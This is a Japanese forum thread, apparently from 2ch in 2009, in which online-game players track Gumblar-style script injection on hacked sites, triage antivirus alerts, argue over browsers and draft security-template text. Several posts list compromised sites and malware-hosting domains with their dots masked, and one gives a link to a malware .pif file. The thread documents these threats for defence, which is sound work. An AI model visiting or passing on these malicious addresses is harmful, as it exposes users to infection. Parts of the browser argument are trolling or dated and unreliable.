重いしトラブルあるから入れてないんだよ数年、でもウイルス感染したことはない <> (○口○*)さん<>sage<>09/10/23 08:20 ID:/y4xoU/W0<> 狩場情報、またscriptタグが挿入されてる。やっぱ鯖自体がクラックされてるか
中の人のPCが何かに感染してて、FTPアカウントを奪取されっ放しのどっちかじゃないの。 <> (○口○*)さん<>sage<>09/10/23 08:24 ID:SnEcVHkl0<> 今のところ、どこから漏れているかは判明していないよな。
でも感染の可能性が高いのかなあ。 <> (○口○*)さん<>sage<>09/10/23 08:27 ID:yfIEZ6eX0<> >>880
はいと言われたら安心するのか?
いいえと言われたらどうするのか?

ウィルスに感染したら自分の責任だし
出来るだけ対策やっておくものじゃないのか? <> (○口○*)さん<>sage<>09/10/23 09:14 ID:dRthzH6W0<> >>881
今SCOで見たら感染してないように見えたけど、今も感染してるの? <> (○口○*)さん<>sage<>09/10/23 09:20 ID:f7A+UiZe0<> 「タグが挿入されてる」と書いてあるだろ。
どこそこのチェッカで見たら云々とかそんな次元じゃねぇっての。 <> (○口○*)さん<>sage<>09/10/23 09:30 ID:i14L+fuL0<> htmlソースを作った事が無い奴にはタグ挿入云々言っても
分からないんじゃないか

簡単に言うと、メモ帳でも何でもいいからヘッドを始めとする
「タグ」を組み合わせながらWebで閲覧できるページを作る(ソース)

作ったメモ帳ソースを、Ftp経由でWebにアップロード

→ホームページ

このソースの部分、タグが弄られてアップロードされてるから
Webでもそのまま反映される

→管理人以外の誰かが、改竄してFtp経由で挙げている

ソースがわからなきゃどのページでもいいからWebで右クリ
ソースの表示で見てみればいい。
数字と<>の羅列がタグだから、そこが第三者に弄られているって事 <> (○口○*)さん<>sage<>09/10/23 09:33 ID:PtsvoKho0<> >>881
SCOの方で見れる10/21キャッシュのものと今入っているのURLが違うね。
メモ帳でソース開いてみた。
21日のやつ → folkartist-kr■com/ → smaug■cz/ (wordpress)
今入ってる方 mobatube■ps■land■to/douga/itemlist■php?pid=152
罠phpの中身も置いてあるけど広告も置いてある謎のページで、URL削ってもそれしか出てこない。

www.asahi-net■or■jp/~KN4K-EGC/
「鎌倉散歩」でググるとトップに出てくる
frame構造でそこで呼び出してるhtmlページのほとんどに罠phpが埋まってるみたい。
asahi-netに通報しようかと思ったけど、通報窓口が見つからず断念。
 → thalassapromotion■eu/ → honda-p3■com/

craft■ne■jp/
以前は京都の店舗リストのようのなものだったらしいが
今は craft■ne■jp is underconstraction. という謎のエラーページしかない。
デジロックか・・・。
 → lesliejohn.net/ → seadiveresort.com/  → creativewebsols.com/ <> (○口○*)さん<>sage<>09/10/23 10:44 ID:dRthzH6W0<> >>885>>886
なるほど。あんまり詳しくないから分からなかったわ <> (○口○*)さん<>sage<>09/10/23 10:51 ID:SnEcVHkl0<> ソース見たら吹くよ
<body>の前にあからさまに入っているから

ftpアカウントがハックされると改竄も出来るし置き場にも出来るし、
ゼロデイ攻撃に使われたらたまらんかもしれん <> (○口○*)さん<>sage<>09/10/23 11:00 ID:56ESXe810<> >>880
マジですか?すげぇ
あんただけはきっと感染しない古代術式な防壁とかあるんだろうな <> (○口○*)さん<>sage<>09/10/23 11:12 ID:3QSO4wDk0<> スキャンもやったことないんじゃね
一度スキャンしてみたら多分ワームが1000匹単位で出てくるよ <> (○口○*)さん<>sage<>09/10/23 13:28 ID:Bk0w2pWB0<> パッチ変更点スレに張られてたので一応
http://node3■img3■akibablog■net/09/oct/8/seitokai/112■html
画像を掲載した記事押してもリンク先が見つからず <> (○口○*)さん<>sage<>09/10/23 13:33 ID:1mQ8wtaW0<> >>887
craftと同じ管理者っぽいinter■ne■jpもあやしいんだよね
検索ではひっかかるが削除済みの模様
片方だけ削除するのもおかしな話だから両方削除後に片方復活したのかなーと <> (○口○*)さん<>sage<>09/10/23 13:34 ID:1mQ8wtaW0<> >>884
SCOは過去にいったことあるとこはキャッシュを保持してる
それを削除すれば現在のソースになるよ <> (○口○*)さん<>sage<>09/10/23 13:37 ID:1mQ8wtaW0<> >>878
検出率低いから心配なら入れなおすしかないっていってんのに
それ全部見つからなかったら安心なの?
まあカスペかGDataならブラウザキャッシュがひっかかるかもしれないけども

>>880
Java無効にしても意味ないです
ためしにオンラインスキャンしてみてください <> (○口○*)さん<>sage<>09/10/23 13:45 ID:kJpsQUK00<> ひっそり、やっとページ削除したな。
ここまでするの遅すぎ。 <> (○口○*)さん<>sage<>09/10/23 15:53 ID:kOBlwHBG0<> よーやくYahooニュースにGumberウィルス情報アップされました。
遅いって…orz

ttp://headlines.yahoo.co.jp/hl?a=20091023-00000030-zdn_ep-sci

これによると、今回は
>新たにセキュリティ対策ソフトを妨害する機能も実装されている
とのこと。
マルウェア名:Trojan-Downloader.JS.Gumblar.x <> (○口○*)さん<>sage<>09/10/23 16:01 ID:K0biO1EL0<> Trojan-Downloader.JS.Gumblar.xはカスペが定義した攻撃スクリプトの名前であって
こいつ自身がパスワード盗んだりするわけじゃないんだけど
なんか書き方がアレだなあ <> (○口○*)さん<>sage<>09/10/23 16:07 ID:kOBlwHBG0<> 今回の攻撃方法に関しては、以前、対策がちゃんと取られていないサイトが感染源で、
方法に関しては本スレで書かれている方法で対応されてるって話ですね。
というか、14日から出てたとは…orz

相手の攻撃としては、PDF、Flash以外に実行ファイルの脆弱性を狙っているそうですが、
これといった対応方法が「JavaとActiveXの使用不可と最新パッチを当てる」という文面だけというのが…。

現在のところ、前回のGumberと同じく、各ウィルス対策ソフト会社では対応できていないそうですので、
上記対策をしっかりした上で、チェックしながら確認する方法しか回避方法がないです。 <> (○口○*)さん<>sage<>09/10/23 16:38 ID:H/7dDy5T0<> Adobeによるweb表現システムの寡占化は、MicrosoftがOSによって行ったそれよりも一層深刻。
こちらはOSを問わず関りがあるし。
リッチすぎるコンテンツもまた、ある種の弊害を生むからねえ。
プリキュアベンチと称されるあれなんて、本来のターゲット層の閲覧環境では一体どうなるのやら。 <> (○口○*)さん<>sage<>09/10/23 16:39 ID:SnEcVHkl0<> 微妙にスレチ <> (○口○*)さん<>sage<>09/10/23 16:51 ID:H/7dDy5T0<> Adobeのガリバー化に関しては、セキュリティベンダーの中にも似た意見を持つ人がいるようなので引用。

Adobeを捨てるときが来たのかも
ttp://www.itmedia.co.jp/news/articles/0903/10/news025.html <> (○口○*)さん<>sage<>09/10/23 20:12 ID:EnGkcfaj0<> Gumblar に酷似、新たな脅威発生に警告
ttp://www.kaspersky.co.jp/news?id=207578788

Kasperskyが記事にしたからItmediaが記事にして、
それをyahooが転載したってことなのか。
5月の時も早めに検出したマカフィーなどのサイトへは繋がらなかったはずだから
今回その繋がらない先が増えただけじゃないのかね <> (○口○*)さん<>sage<>09/10/23 21:27 ID:i14L+fuL0<> カスペも警告してるのか
無料アンチソフトが期限切れて入ったままの奴とか、どっかから感染してそうだな <> (○口○*)さん<>sage<>09/10/23 23:27 ID:yeu3tX4n0<> 複数のソフトでチェックを入れるのは基本だなあ <> (○口○*)さん<>sage<>09/10/24 00:04 ID:qrhYd27V0<> 黒い画面にマウスカーソル (Win32/Daonol) - MS
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
別系統の感染経路もあるみたいね。
PCもサーバーもサイトも、バックドア開けられてたらいろいろ棲んでるってことなんだろうけど <> (○口○*)さん<>sage<>09/10/24 00:52 ID:fBqISV5p0<> ウイルスバスターの検索に、Adware-Softomate、っていうのが引っかかり、削除されたんだが、
これって何かマズイものでしょうか?
ROのPASSとか変更したほうがいいですか? <> (○口○*)さん<>sage<>09/10/24 01:20 ID:XKMuruy+0<> よくわからないのにほいほいエロサイト巡回するから・・・ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/24 01:32 ID:17MDyRv80<> クラックの話がちらほら上がっている事から
利用者が多いかと思われる狩場情報さんを
hostsに加えるかどうかで
現状どうなっているか仕込まれを覗いてみようとしたのですが…

ソースチェッカーでは無く
aguseGatewayでソースを見ようとしたら403表示になってました。
現状の対策としてトップページ自体を削除したのかも?
403でしたが臨時にリスト入りさせてみました。


自分としても意味があるかどうかは判らないですが
ここに報告で挙げてもらっているURLについては
後手後手対応ですがクラックされた物として追加していく感じで。 <> (○口○*)さん<>sage<>09/10/24 09:03 ID:HfnegT+80<> >>909
>>896 <> (○口○*)さん<>sage<>09/10/24 11:57 ID:qrhYd27V0<> >>909
サイトから罠PHPを消した場合、対策を何もしていないとまた入れられるようですが
罠PHP置き場が潰されて404になった場合も、script srcの誘導先を書き換えているようです。

日本語の感染サイトでまだ上がっていないかもしれないものだけ書いておきます

layout■client■jp/ 鉄道模型のサイトらしい 

www■toyoshoten■co■jp/ 東洋書店

ps11■net/cosme3/ 携帯向けのサイト

www■ikebukurogakki■jp/ YAMAHA いけぶくろ楽器
ここに埋められているphp置き場のサイト kashej■dk/ は
トップを見ても真っ白なんですが 今回の罠php と8080のonload属性のほう
それと難読化したスクリプトが書かれています。

onload属性の8080についてはcNotesさんの方に記事が上がっていますが

インジェクション onload属性の利用
 ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3+onload%C2%B0%C0%AD%A4%CE%CD%F8%CD%D1 

過去に8080 の"visibility: hidden"だったところ(キャッシュにはhiddenが残っている)が
これに書き換わっているところをいくつか見かけました。

これも関係してるかもしれません
Rogue Apps ? Catch Me if You Can (Symantec)
ttp://www.symantec.com/connect/blogs/rogue-apps-catch-me-if-you-can <> (○口○*)さん<>sage<>09/10/25 04:39 ID:WoNXuwHo0<> 4gameランキングのインラインが張ってあるURLが、うちのサイトに貼り付けられていました。
今スレッドで未出のようなので報告しておきます。

aimeblog■com/yuka225/ <> (○口○*)さん<>sage<>09/10/25 14:32 ID:ZoJaG4lp0<> >>912
ドメイン的には常連だなあ
コメントによる貼り付けってこと? <> (○口○*)さん<>sage<>09/10/25 17:58 ID:WoNXuwHo0<> >>913
そうです。親しみやすい文章のコメントと共にURLが張り付いてました。
相手を疑ってからじゃないとコミュニケーションできないなんて、悔しいなぁ。 <> (○口○*)さん<>sage<>09/10/25 18:08 ID:ZoJaG4lp0<> ブログのっとられたなら別だけどコメントなら削除すればいいね
文章も何もかもコピペですんで何の迷いもなく削除してください
日本語通じないんでコミュニケーションなんて取れないよ <> (○口○*)さん<>sage<>09/10/25 19:35 ID:cp5zREVR0<> 頑張って消していると「どうして邪魔をする」と言う中華がいるとか <> (○口○*)さん<>sage<>09/10/25 19:50 ID:WoNXuwHo0<> 悪意のない人に対しても、同じ疑いを持って始まるという意味ですね。 <> (○口○*)さん<>sage<>09/10/26 13:00 ID:5Iz/flNh0<> お兄様方、またまた拾い所不明で思い当たる場所がないのにウィルス検知されました。

【      気付いた日時          】 10/26 12:30ごろ
【不審なアドレスのクリックの有無 】 怪しいところを踏んだ覚えがないです
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 Windows-XP Professional Version2002 ServicePack3
【使用ブラウザ 】 InternetExplorer7
【WindowsUpdateの有無】 自動更新
【 アンチウイルスソフト 】 AVG Anti-Virus Free edition 8.5.423
【その他のSecurty対策 】 ルーター入ってます
【 ウイルススキャン結果】 AVGで\RagnarokOnline\rdefk.dfd から トロイの木馬Generic15.XQD を検出
【スレログやテンプレを読んだか】 Yes
【hostsファイルの変更】よくわからないので触ってないと思います
【PeerGuardian2の導入】同じくよくわかってないです
【説明】 毎日AVGでスキャンしてて昨日は何もなく今日になって検出です。
     いつ踏んだとかAVGの常駐シールドでは反応ありませんでした。
     怖くて今のところROにログイン等の確認はしていません。

誤検知なのか、OS再インストールからやり直し&パス等変更した方がいいのか、
アドバイスお願いします。 <> (○口○*)さん<>sage<>09/10/26 13:05 ID:ee8CBZg/0<> 俺も同じトロイ検出した
誤認だと思うが <> (○口○*)さん<>sage<>09/10/26 13:11 ID:wJZub/lM0<> rdefk.dfdの誤爆は過去にもあったよーな。
心配なときはオンラインスキャン2つくらい通すか、思い切ってVTに投げればいいよ。 <> (○口○*)さん<>sage<>09/10/26 13:11 ID:yvks8HKm0<> 少し前も一時期誤検出らしいがROのEXEにトロイの木馬Genericで反応したりしてたような… <> (○口○*)さん<>sage<>09/10/26 13:23 ID:yIK6HUdh0<> ネトゲクライアントなんてしょっちゅうだよな。
数日前はMcAfeeがFF11を吹っ飛ばしたし。 <> 918<>sage<>09/10/26 13:33 ID:5Iz/flNh0<> やっぱり誤検知が濃厚ですか・・・
以前もRO2で同じように検出されたことがありました。
心配なのでひとまず他のオンラインスキャンをやってみようかと思います。
ありがとうございました。 <> (○口○*)さん<>sage<>09/10/26 17:01 ID:YHNkcDqU0<> >>918
IEは8にしましょう <> (○口○*)さん<>sage<>09/10/26 18:37 ID:zHth9psm0<> >>924
7でも無問題だと思うが、なぜいけないんだい?
理由を教えてくれ。 <> (○口○*)さん<>sage<>09/10/26 18:40 ID:f/6YwTaq0<> まあでも敢えて7を残す理由もないと思う <> (○口○*)さん<>sage<>09/10/26 21:17 ID:gtxozyng0<> どうせお好みのブラウザで宗教戦争やってるヤツだから触んなよ。
セキュリティの観点から見たら7でも8でもどっちでもおk <> (○口○*)さん<>sage<>09/10/26 21:19 ID:f/6YwTaq0<> >>927
その発言はフレームの元って自覚がないなら君は荒らしと同じだよ <> (○口○*)さん<>sage<>09/10/26 21:37 ID:KkeAO0HI0<> >>926 >>928

理由も示さず、ああいう発言はキミも同罪だな。
口を噤むべきだな。

はい次↓ <> (○口○*)さん<>sage<>09/10/26 21:40 ID:X+LX+8vp0<> IE7に今のところ致命的問題がないってだけでIE8推奨

ttp://itpro.nikkeibp.co.jp/article/COLUMN/20090608/331403/
>一方,“IE 7”の場合でも“IE 8”にアップすることをお勧めする理由は,“IE 7”よりも“IE 8”が,
>さらに『デフォルト・セキュア(Secure By Default)』になっているからです。 <> (○口○*)さん<>sage<>09/10/26 21:43 ID:a4FMjIoD0<> 新バージョンに重篤な不具合でもあるんでない限り、
旧バージョンを残しておく理由なんてねぇよ常識的に考えて <> (○口○*)さん<>sage<>09/10/26 21:48 ID:4X8enbjf0<> >>918

IE8を熱心に勧めている人がいるようですが、セキュア云々をいうならFirefoxかoperaが鉄板。
IEは問題外。

特にネトゲしてるならね・・ <> (○口○*)さん<>sage<>09/10/26 21:50 ID:fEiF0Qy50<> おまえら揉めるなよ

>>5を見ろ。 <> (○口○*)さん<>sage<>09/10/26 21:52 ID:g+Z5Iupe0<> そんなデフォルトナントカなどという横文字で誤魔化しに掛からないといかんようじゃ
メンドクサイからという理由でIE6以下に留まってる連中は到底動かないよな

MSの最新バージョンは常に地雷持ちと認識して避けてるのって案外多い気が
単純に俺の周りだけなのかな? <> (○口○*)さん<>sage<>09/10/26 21:54 ID:IwQKIUVm0<> いや、だからIE8が最高なんだってば!!!
mikrosofto純正なんだよ?

Firefox使ってるヤツは糞!!! <> (○口○*)さん<>sage<>09/10/26 21:58 ID:KGwpEWPv0<> テンプレの>>5はおかしいと思います。
次スレから推奨ブラウザはIE8にしましょう。
私がスレ立ててきます。 <> (○口○*)さん<>sage<>09/10/26 22:10 ID:KGwpEWPv0<> デフォルト・セキュア(Secure By Default)なのです。 <> (○口○*)さん<>sage<>09/10/26 22:22 ID:xHtCD3uF0<> IE8で騒いでるヤツらいい加減にしろ!
お前ら全員荒らしだぞ。 <> (○口○*)さん<>sage<>09/10/26 22:56 ID:9Kwaprk60<> やはりIE8推奨

Internet Explorer 8 : かつてない新機能
ttp://www.microsoft.com/japan/windows/products/winfamily/ie/function/default.mspx


Internet Explorer 8 は、マルウェアに対する業界最高の保護機能を提供するだけでなく、
以前のバージョンの機能も大幅に強化されています。
ttp://www.microsoft.com/japan/windows/enterprise/products/internet-explorer/default.aspx <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/26 23:52 ID:Qk4hduAv0<> いきなりスレが加速して妙なところで話が出たので
そろそろ次節のテンプレについて話を振ってみたり。

PeerGuardian2についての記述なのですが、
リネージュ資料室さんのIPフィルタの項目にもあるように
PG2が色々な面もあり、新しいPeerBlockへの移行を薦められております。

PBについてのダウンロード方法等も紹介があるので
テンプレの >>3 にあるPG2の記述をこのような感じで草案。
-------------------------------ここから>>3の差し替え案
[このスレでよく出てくるアプリケーション・PeerBlock導入の手引き]
・リネージュ資料室-IPフィルタ-
http://lineage.paix.jp/guide/security/basic-ipfilter.html#PB

1:公式ページ http://www.peerblock.com/ で
 "Get it Now!"の下段にある Downloads を左クリック。
2:Public Releaseの段にある
 "Download the latest Public Release: PeerBlock 1.0"を左クリック。
3:"Get it Here"の"PeerBlock 1.0 Installer"を右クリックでリンク先を保存。
 (インストーラー無しのZip版もありますが必要のある人以外はインストーラーを)
3;ダウンロードしたファイルを実行。
 この時オプションで"Start PeerBlock on system startup"をチェック。
 PG2があらかじめ入っていた場合、設定をそのまま引き継ぐ事が出来ます。
 (※この項目見忘れました。PeerGuardian2〜と書いていたと思います。確認をお願いします。)
 引き継ぐ場合はチェック。
 (ただしフォルダ名やリストの説明文に日本語が混じっていると
  文字化けを起こすので、前もって英語表記にするか
  やはりインストール後に自力で直しておく必要があります。)
4:リネージュ資料室さんの手順に従って
 危険URLにあるPeerBlock用定義ファイルリストを登録。
 手順については手引きのリンク先を読んでください。 <> (○口○*)さん<>sage<>09/10/27 00:09 ID:VPwsiRfF0<> >>940
後継できてたんだ。情報thx! <> (○口○*)さん<>sage<>09/10/27 00:19 ID:7176cbVT0<> 前からあるけれどここであんま話題になんなかったのよね <> (○口○*)さん<>sage<>09/10/27 00:27 ID:GUTs8xJt0<> PeerBlockが勝手に落ちてアイコンだけ残ったままの状態になることが多々あるんだけど
肝心な時に落ちてたら使えねえ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/27 00:32 ID:fD+kgc6I0<> PeerBlockについてなのですが日本語化パッチは現在ない模様です。
判る人は判るんですが英語ですし不安もあるかもなので、
後日簡易ながらPG2とPBの画像をまとめ臨時のページにUPします。

でも自分であらかじめPG2の画像を撮っておいた方が解るかも。 <> (○口○*)さん<>sage<>09/10/27 00:32 ID:mZehdmLs0<> 落ちたときタスクバーのアイコンにマウスカーソルを合わせると消えたりしない?

アプリ側の作りなのかWindowsの仕様なのか知らないが、
異常終了時にタスクバーの更新がされないようで、
表示だけ残ってしまうのがたまに見るな <> (○口○*)さん<>sage<>09/10/27 00:34 ID:7176cbVT0<> >>945
タスクトレイでない?
仕様みたいなもんだな <> (○口○*)さん<>sage<>09/10/27 00:48 ID:GUTs8xJt0<> >>945
この異常終了の原因がさっぱりだ
気付いたら死んでるし <> (○口○*)さん<>sage<>09/10/27 01:01 ID:72j2OsBs0<> IE7はCSS絡みのバグも多い。それに対してIE8はw3cに歩み寄り、CSS 2.1互換性を向上させている。
また、jscript.dllのパフォーマンスが大幅に向上し、JavaScriptを使用したページでのレスポンスが改善されている。

Web製作サイドに、IE6ハックのような本来不要な手間を取らせる必要も無くなり、快適さの面でもメリットが大きい。
どうしてもIEを使い続けるなら、IE6や7は捨て去るべきだ。 <> (○口○*)さん<>sage<>09/10/27 01:13 ID://GXhGEi0<> じゃあ俺はNS3にする <> (○口○*)さん<>sage<>09/10/27 02:08 ID:9TDWcxys0<> IE8のjabaは世界最速である。
垢ハックにももっとも強いブラウザとして知られているのだ。
FFやオペラも捨て去るべきだ。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/27 02:11 ID:9PTBKmzA0<> うちの環境ではPeerBlockは安定して動作しているみたいです。
タスクのエラーは出たことはないです。

PBの異常終了…ブラウザは関係ないだろうし…
とりあえずOSのバージョンを記述。
WinverでVersion5.1(Build2600xpsp_sp3_gdr090804-1435:servicePack3)
OSのXPは32bitです。

むしろバスター2010がPC終了時にC++のアプリケーションエラー。
エラーR6025が出たり出なかったりで検索したら対処法としてあった
Microsoft Visual C++ 2005 再頒布可能パッケージ (x86)、
Microsoft Visual C++ 2008 再頒布可能パッケージ (x86)を再インストール。
とりあえずこれで今は様子見。 <> (○口○*)さん<>sage<>09/10/27 02:17 ID:KHzTHVmm0<> >>951

IE8を使えば問題は解決するのである。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/27 03:15 ID:9PTBKmzA0<> >>910
見ていたのにリストをどうするかでいっぱいで文章を読み取れてなかったようで…。
つっこみありがとうございます。

>>942
RO住人がPG2を現行で何とか使えているから…かも?
Windows7が出たことで対応が進んで不具合が無くなればとか。




うーん、なんだかブラウザで白熱しているのか…。

>>933の誘導したテンプレ>>5
IEの穴が最も狙われていた事で
被害を受けるのを少なくする方法としてウイルス対策として
今まで被害を受けた人らや有志の情報でまとめられたものです。
ただここ最近の罠サイトの幾つかは
ブラウザごとで設定されてFlashPlayer?の脆弱性を突く物だったりします。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/27 03:16 ID:9PTBKmzA0<> >ブラウザについて。
自分の場合は以前はガチガチのIE派で、今でもIE8は使用していますが
IEのオプションセキュリティは相変わらず初心者では難しいところがあります。

設定しても塞ぎきれているか心配性なので
通常はもう一段階ブロックできるNoscriptがあるFireFoxも使用しています。
デフォルト設定Noscriptの導入手順と仕様が解れば、
IEより簡単にセキュリティ対策がし易いと感じました。
FireFox側はFlashPlayerも入れていないので見るだけなんですけどね。

でもIE8やFireFoxやOreraでも
 常に最新のバージョン出なければ脆弱性を突かれますし
 Flashプレイヤーとかが最新でなかったら同じことになります。
全て最新でも未知の脆弱性や亜種に対抗できるかはわからないです。


IEに関して言えばバージョンが上がった時に
初期段階で不具合がある事に懸念を懐いたりとかで
前のバージョンを使う方が居ると思います。
(OSでもXPでなく2000を使い続けているとかそういうのと同じかも)
ただMS公式のサポートが受けられる範囲での
OSやブラウザを使った方が楽かもです。


どちらにせよROはIEを使用してログインしなければいけないので…。
IEに関してセキュリティ対策は万全にしておかなければいけません。
でもネットブラウザに関しては、
見極めたうえで責任が持てるネット環境ならいいのではないでしょうか?
もちろん対策は怠らない前提で。


と、素人でここのスレッドの報告や
セキュリティの人らに教えてもらった口なので偏っているとは思いますが。 <> まとめ臨時 ◆kJfhJwdLoM<>age<>09/10/27 03:21 ID:9PTBKmzA0<> 微妙に見逃してた誤字Oreraってなんだ…OperaOpera。

ついでにPeerGardian2の新しいバージョンのPeerBlockの告知あげ。
>>940からに詳細あり。PG2のリストはそのまま使えます。
Vistaでエラーが出ていた人は試してみるとよいかもです。 <> (○口○*)さん<>sage<>09/10/27 03:21 ID:VWLyi2i80<> 最新版に不具合がなければ旧バージョンを使う意味がない
なんてセキュリティ関係のスレで見るハメになるとは思わなかったwww
どう見ても逆だろう・・・

旧バージョンにクリティカルな不具合がない限りバージョンアップする必要はない

が正しい
特にソフトウェア界隈では相性問題や競合が何よりも問題で
ウイルス対策ソフトの最新版がnProとの相性で〜と言うのは最近も見た話
入れてしまってから戻せずにOSインストールとかになる手間を考えれば
たかが1つのソフトのために全てを犠牲にするリスクは避けるべき
現状で被害が発生していないなら、そのユーザーにとってはその環境が適していると言うこと
パッチを当てておくのはもちろん必須だけど、それ以上は個人の判断に委ねられる
現状発覚していないことでも入れてしまったことで「個人として」不便を強いられることもある

ソフト本体のバージョンアップを推奨ではなく盲信・強制するのは逆に害悪でしかない <> (○口○*)さん<>sage<>09/10/27 03:31 ID:eVWaDk4L0<> 教えてくれ五飛
俺はあと何人、NGにすればいい <> (○口○*)さん<>sage<>09/10/27 03:36 ID:KHzTHVmm0<> IE8は推奨
IE6とIE7は捨て去るべきである。
古いバージョンソフトを使うことは許されない。
デフォルト・セキュア(Secure By Default)なのである。 <> (○口○*)さん<>sage<>09/10/27 03:41 ID:7176cbVT0<> このまま続くようなら削除依頼だな <> (○口○*)さん<>sage<>09/10/27 05:04 ID:72j2OsBs0<> IE6は色々と論外ではある。
透過PNGが駄目、margin関係がガタガタ、XHTMLの解釈がズタボロ。
更には、ベンダー側からも最後通牒を突きつけられている。
ttp://www.itmedia.co.jp/news/articles/0908/06/news031.html

IE7は幾分かましになったとはいえ、過渡期の中途半端な実装が祟ってStrictモードの解釈が色々とおかしい。
後方互換性の確保と、web標準への準拠がどっちつかずになっている。
お蔭で、サイト制作者がIE6/IE7/それ以外のモダンブラウザと個別対応をする必要に迫られている。
Gecko/WebKit/KHTML/Prestoエンジンは全てモダンブラウザの括りで済む時代。

IE8でようやく、サイト制作者の意図する見え方を得られるようになった
ttp://builder.japan.zdnet.com/sp/internet-explorer-8-2009/story/0,3800095257,20391111,00.htm
IE6/7はXPモードの中で余生を過ごしてもらうのが良い
ttp://www11.atpages.jp/~webdev/?cat=9 <> (○口○*)さん<>sage<>09/10/27 06:34 ID:98D/w9VU0<> テンプレの要修正箇所

>>5
現状>  ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
訂正>  ・偽装jpg対策(IE6SP2以降限定。IE6SP1以前では出来ない)

>>3
PG2のところ、Peer Block も記載した方がいいかもしれない。こっちはVistaとWin7にも対応してた筈。
XP→P2G、Vista/Win7→Peer Block 文面は誰か考えてくれ。
公式HP: ttp://www.peerblock.com/

Peer BlockをVista/Win7の起動時から管理者権限で起動するのに使える方法。
http://www.blackcatlab.com/article.php/090804_SendKeys_under_UAC <> (○口○*)さん<>sage<>09/10/27 07:28 ID:i+RQsVO80<> この辺も修正検討で。
>>2
現状) ・アカウントハッキングについて > 被害にあってしまったら(RO公式)
  ttp://www.ragnarokonline.jp/playguide/hacking/hacking_04.html
修正) ・アカウントハッキングについて(RO公式)
  ttp://www.ragnarokonline.jp/playguide/hacking/
# 飛び先は小項目よりもインデックスの方が望ましい。他の項目に書かれている内容にも目を通すべき。
保留) ・Adobe Flash Playerの脆弱性および XREA広告サーバハッキング問題 まとめ
  ttp://www.geocities.jp/pehchunpm/mondai_XREA.htm
# サイトが403状態。復旧の見込みが無い場合は最終的に削除で。
## 2009年度版のデジロウイルスまとめサイトも存在するが、これを追加する必要があるかどうかは棚上げ。
追加) ・FFXI(仮)
ttp://ilion.blog.shinobi.jp/
##FF11における、リネージュ資料室のようなスタンスのBlog。危険サイトの情報集積が精力的に行われている。
追加) ・So-net セキュリティ通信
ttp://www.so-net.ne.jp/security/
#ここもRSS購読推奨。ISP自ら提供している情報源だという安心感もある。
セキュmemoよりも政治色が薄いので、そういう人も安心(?)

>>3
現状) ・ソースチェッカーオンライン (ソースや隠れたインラインフレームの転送先を確認できる)
 ttp://so.7walker.net/guide.php
追記) 2009/12/20運用終了予定の文言を何処かに併記。
追加) ・@niftyウイルスチェックサービス
ttp://www.nifty.com/security/vcheck/
#Kasperskyエンジンを採用したオンラインスキャンサービス。本家が上手く動かない時などに。

>>投入先未定
・都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm
#RO公式のアカハック対策からも飛べるけど、スレ内でアンカーを張って示したい時用。
・DriveImage XML Backup Software - Data Recovery Product
ttp://www.runtime.org/driveimage-xml.htm
#フリーで多機能なHDDイメージ取得ソフト。使い方は ttp://pnpk.net/cms/archives/137 などを参考に。 <> (○口○*)さん<>sage<>09/10/27 10:36 ID:GUTs8xJt0<> 一言言っておくとIEはブラウザじゃなくてOS <> (○口○*)さん<>sage<>09/10/27 12:00 ID:FSn2N4o00<> 個人サイトだから仕方ないが、セキュリティホール memoはセキュリティと
関係ない記事が多いなぁ…。 <> (○口○*)さん<>sage<>09/10/27 23:44 ID://GXhGEi0<> 【社会】オンラインゲーム不正アクセス助長 無届けサーバー設置容疑で中国籍のネットカフェ経営者(28)
http://tsushima.2ch.net/test/read.cgi/newsplus/1256646262/ <> (○口○*)さん<>sage<>09/10/28 00:03 ID:8i12Dmox0<> ttp://www.dospara.co.jp/support/share.php?contents=lg_drive_091020
いつもドスパラをご利用頂き、誠にありがとうございます。
2009年10月13日から2009年10月20日までに販売されたデスクトップPCに付属しているユーティリティディスクのうち、「Super Multi Drive Install Disc for Windows」ディスクの 一部において、ウィルスが混入されていることを確認致しました。
対象製品をご購入のお客様へは多大なご迷惑をお掛けする事を深くお詫び申し上げます。 <> にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん (○口○*)さん<>sage<>09/10/28 09:03 ID:TWO+tI740<> >>967
踏んだというのが何をどうしたのかによる。ファイルを落としただけならセーフ。実行してしまったならアウト。
よくわかっていない(説明できない)なら、OS再インストール以外を勧めるのは危険。

複数のパスが抜かれる可能性はあるが、基本的には発動させた後に入力したものに限る。 <> (○口○*)さん<>sage<>09/10/28 09:09 ID:HxPtUTv20<> >>968
踏んだらもうダウンロードしてしまっているものでしょうか?
踏んでからはROを触っていません

>実行してしまったならアウト
何をしたら実行になりますか? <> (○口○*)さん<>sage<>09/10/28 09:17 ID:qXpuJHKj0<> 検出してブロックしたなら大丈夫だと思うけれど、
どこかの板にあったリンクでも踏んだの?説明が微妙に足りない。
あと、アドレスのピリオドは記号に変えてください。踏んだら困るでしょ? <> (○口○*)さん<>sage<>09/10/28 09:24 ID:HxPtUTv20<> >>970
大丈夫ですか?
ということはAvastが対応していた、ウイルスが古いものだった、ということですか?

アドレスは2chのVIPに貼ってありました
http://aimeblog■com/play/mober_v0■5fis■pif
すみません <> (○口○*)さん<>sage<>09/10/28 09:25 ID:TWO+tI740<> >>969
>踏んだらもうダウンロードしてしまっているものでしょうか?
リンクをクリック→ファイル保存または実行のためにローカルにファイルを落とそうとする

 ダウンロード完了時にファイルをHDDに書き込もうとした時にセキュリティソフトが反応したのか、
 ローカルに保存した後で実行しようとしてメモリ上に読み込み(ファイルを展開)した時点で反応したのか
 判断不能。自分がどんな操作をしたのか正確に説明できないなら諦めてOS入れなおしてこい。

>踏んでからはROを触っていません
 その場合は、パスワードは盗まれていないと思われますので、OS入れなおしだけでOK。
